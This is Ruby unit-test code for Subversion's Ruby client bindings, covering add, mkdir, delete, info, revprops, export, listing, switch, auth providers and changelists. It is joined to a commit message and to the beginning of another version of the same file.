ctx.unlock(path)
assert_equal([file], infos.collect{|path, notify| path})
file_notify = infos.assoc(file)[1]
assert(file_notify.unlocked?)
end
# Exercises Client::Context#info on the WC root: yields one entry for
# the repository basename whose URL is the repository URI.
def test_info
log = "sample log"
ctx = make_context(log)
repos_base = File.basename(@repos_path)
infos = []
ctx.info(@wc_path) do |path, info|
infos << [path, info]
end
assert_equal([repos_base],
infos.collect{|path, info| path})
top_info = infos.assoc(repos_base)[1]
assert_equal(@repos_uri, top_info.url)
end
# Verifies depth semantics of Client::Context#info on the greek tree:
# which nodes are reported for each recurse/depth choice.
def test_info_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# Depth is irrelevant when the target is a single file.
recurse_and_depth_choices.each do |rd|
ctx.info(@greek.path(:mu),nil,nil,rd) do |path, info|
assert_equal @greek.uri(:mu), info.URL
end
end
expected_info_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
urls = []
ctx.info(@greek.path(:b),nil,nil,rd) do |path, info|
urls << info.URL
end
assert_equal expected_info_by_depth[rd].map{|s| @greek.uri(s)}.sort,
urls.sort,
"depth '#{rd}"
end
end
# url_from_path maps a WC path back to its repository URL, both as an
# instance method and as a module function.
def test_url_from_path
log = "sample log"
ctx = make_context(log)
assert_equal(@repos_uri, ctx.url_from_path(@wc_path))
assert_equal(@repos_uri, Svn::Client.url_from_path(@wc_path))
end
# uuid_from_path (via an AdmAccess) and uuid_from_url must agree for
# the same repository.
def test_uuid
log = "sample log"
ctx = make_context(log)
Svn::Wc::AdmAccess.open(nil, @wc_path, false, 0) do |adm|
assert_equal(ctx.uuid_from_url(@repos_uri),
ctx.uuid_from_path(@wc_path, adm))
end
end
# open_ra_session returns a live Svn::Ra::Session for the repository.
def test_open_ra_session
log = "sample log"
ctx = make_context(log)
assert_instance_of(Svn::Ra::Session, ctx.open_ra_session(@repos_uri))
end
# Exercises the revision-property API and all of its aliases:
# revprop_list/rplist/rpl, revprop_get/rpget/rpg, revprop/rp,
# revprop_set/rpset/rps, revprop_del. Sets, reads, overwrites and
# deletes svn:log on a committed revision.
def test_revprop
log = "sample log"
new_log = "new sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
info = ctx.commit(@wc_path)
# list returns [props_hash, revision].
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
Svn::Core::PROP_REVISION_LOG => log,
},
info.revision
],
ctx.revprop_list(@repos_uri, info.revision))
# get returns [value, revision]; #revprop returns just the value.
assert_equal([log, info.revision],
ctx.revprop_get(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(log,
ctx.revprop(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
@repos_uri, info.revision))
assert_equal([new_log, info.revision],
ctx.rpget(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(new_log,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
Svn::Core::PROP_REVISION_LOG => new_log,
},
info.revision
],
ctx.rplist(@repos_uri, info.revision))
# Deleting svn:log leaves it nil.
assert_equal(info.revision,
ctx.revprop_del(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([nil, info.revision],
ctx.rpg(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(nil,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.rpset(Svn::Core::PROP_REVISION_LOG, new_log,
@repos_uri, info.revision))
assert_equal(new_log,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
# Setting nil via rps also deletes the property.
assert_equal(info.revision,
ctx.rps(Svn::Core::PROP_REVISION_LOG, nil,
@repos_uri, info.revision))
assert_equal(nil,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
},
info.revision
],
ctx.rpl(@repos_uri, info.revision))
end
# Exercises Client::Context#export: exports the repository to a fresh
# directory and verifies the exported revision and file content.
def test_export
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
tmp_base_path = File.join(@tmp_path, "tmp")
tmp_dir_path = File.join(tmp_base_path, dir)
tmp_path = File.join(tmp_dir_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.ci(@wc_path).revision
assert_equal(rev, ctx.export(@repos_uri, tmp_base_path))
assert_equal(src, File.open(tmp_path) {|f| f.read})
end
# Exercises Client::Context#ls: returns [dirents, locks]; entries know
# whether they are files or directories.
def test_ls
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
dir_path = File.join(@wc_path, dir)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.ci(@wc_path).revision
dirents, locks = ctx.ls(@wc_path, rev)
assert_equal([dir, file].sort, dirents.keys.sort)
dir_dirent = dirents[dir]
assert(dir_dirent.directory?)
file_dirent = dirents[file]
assert(file_dirent.file?)
end
# Exercises Client::Context#list: yields (path, dirent, lock, abs_path)
# per entry; checks node kinds and the have_props? flag for a file with
# a property versus bare directories.
def test_list
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
prop_name = "sample-prop"
prop_value = "sample value"
dir_path = File.join(@wc_path, dir)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.prop_set(prop_name, prop_value, path)
rev = ctx.ci(@wc_path).revision
entries = []
ctx.list(@wc_path, rev) do |path, dirent, lock, abs_path|
entries << [path, dirent, lock, abs_path]
end
paths = entries.collect do |path, dirent, lock, abs_path|
[path, abs_path]
end
# The root itself is reported with an empty relative path.
assert_equal([["", "/"], [dir, "/"], [file, "/"]].sort, paths.sort)
entries.each do |path, dirent, lock, abs_path|
case path
when dir, ""
assert(dirent.directory?)
assert_false(dirent.have_props?)
when file
assert(dirent.file?)
assert_true(dirent.have_props?)
else
flunk
end
end
end
# Verifies depth semantics of Client::Context#list on the greek tree:
# which entries are yielded for each recurse/depth choice.
def test_list_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
expected_lists_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b, :lambda, :e, :f],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
paths = []
ctx.list(@greek.path(:b), 'head' ,nil, rd) do |path, dirent, lock, abs_path|
# The listed directory itself arrives with an empty relative path.
paths << (path.empty? ? abs_path : File.join(abs_path, path))
end
assert_equal(expected_lists_by_depth[rd].map{|s| "/#{@greek.resolve(s)}"}.sort,
paths.sort,
"depth '#{rd}")
end
end
# Exercises Client::Context#switch: switches the working copy between a
# trunk URL and a tag URL (both at HEAD and at explicit revisions) and
# verifies the resulting file content plus the update notifications.
def test_switch
  log = "sample log"
  trunk_src = "trunk source\n"
  tag_src = "tag source\n"
  file = "sample.txt"
  trunk_dir = "trunk"
  tag_dir = "tags"
  tag_name = "0.0.1"
  trunk_repos_uri = "#{@repos_uri}/#{trunk_dir}"
  tag_repos_uri = "#{@repos_uri}/#{tag_dir}/#{tag_name}"
  trunk_dir_path = File.join(@wc_path, trunk_dir)
  tag_dir_path = File.join(@wc_path, tag_dir)
  tag_name_dir_path = File.join(@wc_path, tag_dir, tag_name)
  trunk_path = File.join(trunk_dir_path, file)
  tag_path = File.join(tag_name_dir_path, file)
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  # Build trunk/sample.txt and tags/0.0.1/sample.txt with different
  # contents so a successful switch is observable via #cat.
  ctx.mkdir(trunk_dir_path)
  File.open(trunk_path, "w") {|f| f.print(trunk_src)}
  ctx.add(trunk_path)
  trunk_rev = ctx.commit(@wc_path).revision
  ctx.mkdir(tag_dir_path, tag_name_dir_path)
  File.open(tag_path, "w") {|f| f.print(tag_src)}
  ctx.add(tag_path)
  tag_rev = ctx.commit(@wc_path).revision
  # Switch at HEAD returns the youngest revision.
  assert_equal(youngest_rev, ctx.switch(@wc_path, trunk_repos_uri))
  assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
  assert_equal(youngest_rev, ctx.switch(@wc_path, tag_repos_uri))
  assert_equal(normalize_line_break(tag_src), ctx.cat(path))
  notify_info = []
  ctx.set_notify_func do |notify|
    notify_info << [notify.path, notify.action]
  end
  # Switching to explicit revisions: the file and the WC root are
  # updated, followed by a completion notification.
  assert_equal(trunk_rev, ctx.switch(@wc_path, trunk_repos_uri, trunk_rev))
  assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
  assert_equal([
                 [path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
               ],
               notify_info)
  notify_info.clear
  assert_equal(tag_rev, ctx.switch(@wc_path, tag_repos_uri, tag_rev))
  assert_equal(normalize_line_break(tag_src), ctx.cat(path))
  assert_equal([
                 [path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
               ],
               notify_info)
end
# Exercises simple-auth prompt providers against svnserve: no provider
# raises AuthnNoProvider; wrong username or password raises
# RaNotAuthorized; correct credentials allow #cat.
def test_authentication
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
# Fresh context: no auth providers registered at all.
ctx = Svn::Client::Context.new
assert_raises(Svn::Error::AuthnNoProvider) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = "wrong-#{@author}"
cred.password = @password
cred.may_save = false
end
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = "wrong-#{@password}"
cred.may_save = false
end
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
cred.may_save = false
end
assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
# Shared body for the simple-provider tests: +method+ is the provider
# registration method (e.g. :add_simple_provider). The provider alone
# cannot authenticate without cached credentials; combined with a
# prompt provider supplying the right credentials, access succeeds.
def assert_simple_provider(method)
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
setup_auth_baton(ctx.auth_baton)
ctx.add(path)
ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.send(method)
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.send(method)
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
end
assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
# Plain (platform-independent) simple auth provider.
def test_simple_provider
assert_simple_provider(:add_simple_provider)
end
# Windows credential-store provider; only defined where the binding
# exposes it.
if Svn::Core.respond_to?(:auth_get_windows_simple_provider)
def test_windows_simple_provider
assert_simple_provider(:add_windows_simple_provider)
end
end
# macOS Keychain provider; only defined where the binding exposes it.
if Svn::Core.respond_to?(:auth_get_keychain_simple_provider)
def test_keychain_simple_provider
assert_simple_provider(:add_keychain_simple_provider)
end
end
# Exercises username-only auth providers via revprop_set (which runs
# the pre-revprop-change hook checking the author): the default
# username parameter, a wrong username, an empty prompt provider, and
# a prompt provider supplying the right name.
def test_username_provider
log = "sample log"
new_log = "sample new log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
repos_uri = "#{@repos_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
info = ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = @author
ctx.add_username_provider
assert_nothing_raised do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
# Wrong default username: the repository hook rejects the change.
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = "#{@author}-NG"
ctx.add_username_provider
assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
# Prompt provider that sets nothing also fails the hook.
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
end
assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
cred.username = @author
end
assert_nothing_raised do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
end
# Smoke test: registering the SSL auth providers must not raise.
def test_add_providers
ctx = Svn::Client::Context.new
assert_nothing_raised do
ctx.add_ssl_client_cert_file_provider
ctx.add_ssl_client_cert_pw_file_provider
ctx.add_ssl_server_trust_file_provider
if Svn::Core.respond_to?(:auth_get_windows_ssl_server_trust_provider)
ctx.add_windows_ssl_server_trust_provider
end
end
end
# The deprecated CommitItem/CommitItem2 classes must not be
# constructible; CommitItem3 is, and survives #dup with its url.
def test_commit_item
assert_raise(NoMethodError) do
Svn::Client::CommitItem.new
end
assert_raise(NoMethodError) do
Svn::Client::CommitItem2.new
end
item = Svn::Client::CommitItem3.new
assert_kind_of(Svn::Client::CommitItem3, item)
url = "xxx"
item.url = url
assert_equal(url, item.dup.url)
end
# Verifies that the log-message callback registered with
# #set_log_msg_func receives the commit items, and inspects their
# wcprop/incoming/outgoing prop-change attributes for a plain commit
# and for a WC -> repository copy.
def test_log_msg_func_commit_items
  log = "sample log"
  file = "file"
  file2 = "file2"
  src = "source"
  path = File.join(@wc_path, file)
  repos_uri2 = "#{@repos_uri}/#{file2}"
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  items = nil
  # Capture the commit items by assigning to the outer variable. The
  # original code reused |items| as the block parameter, which only
  # leaked out on Ruby 1.8; since Ruby 1.9 block parameters are
  # block-local, so an explicit assignment is required.
  ctx.set_log_msg_func do |commit_items|
    items = commit_items
    [true, log]
  end
  ctx.add(path)
  ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "text/plain", path)
  ctx.commit(@wc_path)
  assert_equal([[]], items.collect {|item| item.wcprop_changes})
  assert_equal([[]], items.collect {|item| item.incoming_prop_changes})
  assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
  items = nil
  # A direct WC -> repository copy also invokes the log msg func.
  ctx.cp(path, repos_uri2)
  assert_equal([nil], items.collect {|item| item.wcprop_changes})
  assert_equal([nil], items.collect {|item| item.incoming_prop_changes})
  assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
end
# A log-message callback that raises Svn::Error::Cancelled must abort
# the commit with that error.
def test_log_msg_func_cancel
log = "sample log"
dir = "dir"
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
ctx.set_log_msg_func do |items|
raise Svn::Error::Cancelled
end
ctx.mkdir(dir_path)
assert_raise(Svn::Error::Cancelled) do
ctx.commit(@wc_path)
end
end
# Exercises Context#config=: writes a servers config file, loads it
# via Svn::Core::Config, assigns it to the context, and reads it back.
def test_set_config
log = "sample log"
ctx = make_context(log)
options = {
"groups" => {"collabnet" => "svn.collab.net"},
"collabnet" => {
"http-proxy-host" => "proxy",
"http-proxy-port" => "8080",
},
}
servers_config_file = File.join(@config_path,
Svn::Core::CONFIG_CATEGORY_SERVERS)
# Write the options out in INI format.
File.open(servers_config_file, "w") do |file|
options.each do |section, values|
file.puts("[#{section}]")
values.each do |key, value|
file.puts("#{key} = #{value}")
end
end
end
config = Svn::Core::Config.config(@config_path)
assert_nil(ctx.config)
assert_equal(options, config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
ctx.config = config
assert_equal(options,
ctx.config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
end
# mimetypes_map is nil by default and round-trips an assigned hash.
def test_context_mimetypes_map
context = Svn::Client::Context.new
assert_nil(context.mimetypes_map)
context.mimetypes_map = {"txt" => "text/plain"}
assert_equal({"txt" => "text/plain"}, context.mimetypes_map)
end
# Shared scenario for the changelist tests. The caller's block queries
# changelist membership for a given changelist-name argument (string,
# nil, or array) and returns {changelist_name => [paths]}; this method
# adds/removes two committed files to/from two changelists and asserts
# on every query form after each mutation.
def assert_changelists
log = "sample log"
file1 = "hello1.txt"
file2 = "hello2.txt"
src = "Hello"
changelist1 = "XXX"
changelist2 = "YYY"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
File.open(path2, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.add(path2)
ctx.commit(@wc_path)
# No changelists yet: nil matches everything (under the nil key),
# a name or array of names matches nothing.
assert_equal({}, yield(ctx, changelist1))
assert_equal({nil=>[@wc_path,path1,path2]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({}, yield(ctx, [changelist1]))
assert_equal({}, yield(ctx, [changelist2]))
ctx.add_to_changelist(changelist1, path1)
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist1=>[path1],nil=>[@wc_path,path2]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
assert_equal({}, yield(ctx, [changelist2]))
assert_equal({}, yield(ctx, changelist2))
# Adding to a second changelist moves paths out of the first.
ctx.add_to_changelist(changelist2, [path1, path2])
assert_equal({changelist2=>[path1, path2]}, yield(ctx, changelist2))
assert_equal({}, yield(ctx, changelist1))
ctx.add_to_changelist(changelist1, [path1, path2])
assert_equal({changelist1=>[path1, path2]}, yield(ctx, changelist1))
assert_equal({}, yield(ctx, changelist2))
ctx.remove_from_changelists(changelist1, path1)
assert_equal({changelist1=>[path2]}, yield(ctx, changelist1))
ctx.remove_from_changelists(changelist1, [path2])
assert_equal({}, yield(ctx, changelist1))
ctx.add_to_changelist(changelist1, path1)
ctx.add_to_changelist(changelist2, path2)
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
assert_equal({changelist2=>[path2]}, yield(ctx, [changelist2]))
assert_equal({changelist1=>[path1],changelist2=>[path2],nil=>[@wc_path]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({changelist1=>[path1],changelist2=>[path2]},
yield(ctx, [changelist1,changelist2]))
# Removing with a nil changelist name clears membership everywhere.
ctx.remove_from_changelists(nil, [path1, path2])
assert_equal({}, yield(ctx, changelist1))
assert_equal({}, yield(ctx, changelist2))
end
# Fetching changelists without a block returns the path->changelist
# mapping directly as the method's result.
def test_changelists_get_without_block
  assert_changelists {|ctx, name| ctx.changelists(name, @wc_path)}
end
# Fetching changelists with a block yields (path, changelist-name) pairs;
# we accumulate them into a hash and hand that back to the assertion helper.
def test_changelists_get_with_block
  assert_changelists do |ctx, name|
    collected = {}
    ctx.changelists(name, @wc_path) do |path, cl_name|
      (collected[cl_name] ||= []) << path
    end
    collected
  end
end
end
Follow the current notify information behavior.
(Receive absolute path, not relative path.)
* subversion/bindings/swig/ruby/test/test_client.rb
(SvnClientTest#assert_mkdir_with_multiple_paths): New assertion.
(SvnClientTest#test_mkdir_with_multiple_paths):
- Rename from test_mkdir_multiple2.
- Use assert_mkdir_with_multiple_paths.
(SvnClientTest#test_mkdir_with_multiple_paths_as_array):
- Rename from test_mkdir_multiple.
- Use assert_mkdir_with_multiple_paths.
git-svn-id: f8a4e5e023278da1e04e203c7fe051e3c4285d88@871423 13f79535-47bb-0310-9956-ffa450edef68
require "my-assertions"
require "util"
require "svn/core"
require "svn/client"
class SvnClientTest < Test::Unit::TestCase
include SvnTestUtil
# Build the per-test repository/working-copy fixture via
# SvnTestUtil#setup_basic (the meaning of the `true` flag is defined there).
def setup
  setup_basic(true)
end
# Dispose of the fixture created in #setup.
def teardown
  teardown_basic
end
# The client library must report the same version as the core library.
def test_version
  expected = Svn::Core.subr_version
  assert_equal(expected, Svn::Client.version)
end
# A non-recursive add must not schedule children, so the nested directory
# never reaches the repository and cat() on its URI fails.
def test_add_not_recurse
  log = "sample log"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, dir)
  uri = "#{@repos_uri}/#{dir}/#{dir}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  FileUtils.mkdir(path)
  ctx.add(dir_path, false) # recurse=false: inner dir stays unversioned
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::FS_NOT_FOUND) do
    ctx.cat(uri)
  end
end
# A recursive add (the default) schedules the directory and its contents,
# so the file's text is readable from the repository after commit.
def test_add_recurse
  log = "sample log"
  file = "hello.txt"
  src = "Hello"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  uri = "#{@repos_uri}/#{dir}/#{file}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(dir_path)
  ctx.commit(@wc_path)
  assert_equal(src, ctx.cat(uri))
end
# Re-adding an already-versioned directory raises ENTRY_EXISTS unless the
# force flag (third argument) is given, in which case new children are
# picked up and committed.
def test_add_force
  log = "sample log"
  file = "hello.txt"
  src = "Hello"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  uri = "#{@repos_uri}/#{dir}/#{file}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(dir_path, false) # dir versioned, file left unversioned
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::ENTRY_EXISTS) do
    ctx.add(dir_path, true, false) # recurse but no force -> error
  end
  ctx.add(dir_path, true, true) # force add succeeds
  ctx.commit(@wc_path)
  assert_equal(src, ctx.cat(uri))
end
# The fourth add() argument controls whether svn:ignore is honored:
# with it false the ignored file is skipped, with it true the file is
# added despite matching the ignore pattern.
def test_add_no_ignore
  log = "sample log"
  file = "hello.txt"
  src = "Hello"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  uri = "#{@repos_uri}/#{dir}/#{file}"
  ctx = make_context(log)
  FileUtils.mkdir(dir_path)
  ctx.add(dir_path, false)
  ctx.propset(Svn::Core::PROP_IGNORE, file, dir_path) # ignore the file name
  ctx.commit(@wc_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(dir_path, true, true, false) # no_ignore=false: file skipped
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::FS_NOT_FOUND) do
    ctx.cat(uri)
  end
  ctx.add(dir_path, true, true, true) # no_ignore=true: file added
  ctx.commit(@wc_path)
  assert_equal(src, ctx.cat(uri))
end
# mkdir works on both working-copy paths (scheduled for commit) and
# repository URIs (committed immediately); it refuses to re-create an
# existing directory and cannot create missing intermediate directories.
def test_mkdir
  log = "sample log"
  dir = "dir"
  deep_dir = ["d", "e", "e", "p"]
  dir2 = "dir2"
  dir_uri = "#{@repos_uri}/#{dir}"
  deep_dir_uri = "#{@repos_uri}/#{deep_dir.join('/')}"
  dir2_uri = "#{@repos_uri}/#{dir2}"
  dir_path = File.join(@wc_path, dir)
  deep_dir_path = File.join(@wc_path, *deep_dir)
  dir2_path = File.join(@wc_path, dir2)
  ctx = make_context(log)
  assert(!File.exist?(dir_path))
  ctx.mkdir(dir_path)
  assert(File.exist?(dir_path))
  assert_raises(Svn::Error::EntryExists) do
    ctx.add(dir_path) # already scheduled by mkdir
  end
  old_rev = ctx.commit(@wc_path).revision
  new_rev = ctx.mkdir(dir2_uri).revision # URI mkdir commits directly
  assert_equal(old_rev + 1, new_rev)
  assert_raises(Svn::Error::FsAlreadyExists) do
    ctx.mkdir(dir2_uri)
  end
  assert(!File.exist?(dir2_path)) # not in the WC until update
  ctx.update(@wc_path)
  assert(File.exist?(dir2_path))
  assert_raises(Svn::Error::SvnError) do
    ctx.mkdir(deep_dir_path) # parents missing; plain mkdir fails
  end
end
# Shared assertion for mkdir with several paths: the block performs the
# mkdir; notifications must report each path as added, and after commit
# each absolute path must be reported as commit-added.
def assert_mkdir_with_multiple_paths
  log = "sample log"
  dir = "dir"
  dir2 = "dir2"
  dirs = [dir, dir2]
  dirs_path = dirs.collect {|d| Pathname(@wc_path) + d}
  dirs_full_path = dirs_path.collect {|path| path.expand_path}
  ctx = make_context(log)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  assert_equal([false, false], dirs_path.collect {|path| path.exist?})
  yield(ctx, dirs_path.collect {|path| path.to_s}) # caller runs mkdir
  assert_equal(dirs_path.collect {|path| path.to_s}.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal([true] * dirs_path.size,
               infos.collect{|path, notify| notify.add?})
  assert_equal([true, true], dirs_path.collect {|path| path.exist?})
  infos.clear
  ctx.commit(@wc_path)
  # commit notifications use absolute paths
  assert_equal(dirs_full_path.collect {|path| path.to_s}.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal([true] * dirs_path.size,
               infos.collect{|path, notify| notify.commit_added?})
end
# mkdir accepts several paths as separate (splatted) arguments.
def test_mkdir_with_multiple_paths
  assert_mkdir_with_multiple_paths {|ctx, dirs| ctx.mkdir(*dirs)}
end
# mkdir also accepts the same paths packed into a single Array argument.
def test_mkdir_with_multiple_paths_as_array
  assert_mkdir_with_multiple_paths {|ctx, dirs| ctx.mkdir(dirs)}
end
# mkdir_p creates missing intermediate directories (like `mkdir -p`);
# both parent and child must be notified as added and then commit-added.
def test_mkdir_p
  log = "sample log"
  dir = "parent"
  child_dir = "parent/child"
  dir_path = Pathname(@wc_path) + dir
  child_dir_path = dir_path + "child"
  full_paths = [dir_path, child_dir_path].collect {|path| path.expand_path}
  ctx = make_context(log)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  assert_equal([false, false], [dir_path.exist?, child_dir_path.exist?])
  ctx.mkdir_p(child_dir_path.to_s)
  assert_equal(full_paths.collect {|path| path.to_s}.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal([true, true],
               infos.collect{|path, notify| notify.add?})
  assert_equal([true, true], [dir_path.exist?, child_dir_path.exist?])
  infos.clear
  ctx.commit(@wc_path)
  assert_equal(full_paths.collect {|path| path.to_s}.sort,
               infos.collect{|path, notify| path}.sort)
  assert_equal([true, true],
               infos.collect{|path, notify| notify.commit_added?})
end
# delete removes files and directories on commit; a locally modified file
# raises ClientModified unless the force flag is given.
def test_delete
  log = "sample log"
  src = "sample source\n"
  file = "file.txt"
  dir = "dir"
  path = File.join(@wc_path, file)
  dir_path = File.join(@wc_path, dir)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.mkdir(dir_path)
  ctx.commit(@wc_path)
  ctx.delete([path, dir_path])
  ctx.commit(@wc_path)
  assert(!File.exist?(path))
  assert(!File.exist?(dir_path))
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.commit(@wc_path)
  File.open(path, "w") {|f| f.print(src * 2)} # local modification
  assert_raises(Svn::Error::ClientModified) do
    ctx.delete(path)
  end
  assert_nothing_raised do
    ctx.delete(path, true) # force deletes despite modification
    ctx.commit(@wc_path)
  end
  assert(!File.exist?(path))
end
# The rm / rm_f aliases behave like delete / forced delete; rm_f also
# accepts multiple path arguments.
def test_delete_alias
  log = "sample log"
  src = "sample source\n"
  file = "file.txt"
  dir = "dir"
